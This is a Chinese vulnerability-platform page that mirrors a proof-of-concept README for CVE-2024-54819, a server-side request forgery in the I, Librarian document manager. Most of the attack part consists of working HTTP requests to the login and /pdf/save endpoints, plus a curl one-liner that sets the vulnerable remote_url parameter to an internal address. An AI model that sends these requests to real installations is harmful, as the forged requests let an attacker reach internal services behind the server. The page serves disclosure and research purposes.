漏洞平台

POC详情： b549222ba5ed890c31e59eb2fc178420dae826f7

来源

https://github.com/partywavesec/CVE-2024-54819

关联漏洞

标题： I, Librarian 代码问题漏洞 (CVE-2024-54819)
描述：I, Librarian是Martin Kucej个人开发者的一个图书管理程序。 I, Librarian 5.11.1及之前版本存在安全漏洞，该漏洞源于classes/security/validation.php中存在输入验证不当，容易受到服务器端请求伪造攻击。

描述

CVE-2024-54819

介绍

# CVE-2024-54819

Read more details on:
[https://www.partywave.site about CVE-2024-54819](https://www.partywave.site/show/research/CVE-2024-54819_-_I_Librarian_Server_Side_Request_Forgery)

## POST request to login

The attacker must be logged

```bash
POST /librarian/index.php/authentication HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 110
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=poscnjta68n2691tehd5gt9k9e
[removed ...]

username=[USERNAME]&password=[PASSWORD]&csrfToken=[CSRF_TOKEN]
```

## POST request to save PDF

```remote_url parameter``` is vulnerable to its weak validation

```bash
POST /librarian/index.php/pdf/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
[removed ...]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Client-Width: 1920
X-Requested-With: XMLHttpRequest
Content-Length: 135
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/librarian/index.php/item
Cookie: IL=[LIBRARIAN COOKIE] # for example: IL=poscnjta68n2691tehd5gt9k9e
[removed ...]

remote_url=[PAYLOAD]&id=[PDF_ID]&csrfToken=[CSRF_TOKEN]
```

## Bash one-liner

This one-liner is an example with example values to exploit the Server Side Request Forgery:

```bash
curl -X POST http://127.0.0.1/librarian/index.php/pdf/save -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: IL=rcidrisa6hukk5amtmol06b0if" --data-urlencode "remote_url=http://0:6565" --data-urlencode "id=2" --data-urlencode "csrfToken=f3aa558cc79ebf4c48ee042ad61aeaebdf9e9a52b44c64174de398f4f46959df" --proxy http://127.0.0.1:8080
```

![ksnip_20240802-164810(1)](https://github.com/user-attachments/assets/f9d67d2c-bb64-49ee-9589-61a988b46ca7)

And 

![ksnip_20240802-164837](https://github.com/user-attachments/assets/9974cfd7-ab56-4d8e-b368-7b350b6337fc)

文件快照


 [4.0K]  /data/pocs/b549222ba5ed890c31e59eb2fc178420dae826f7
├── [ 34K]  LICENSE
└── [2.1K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。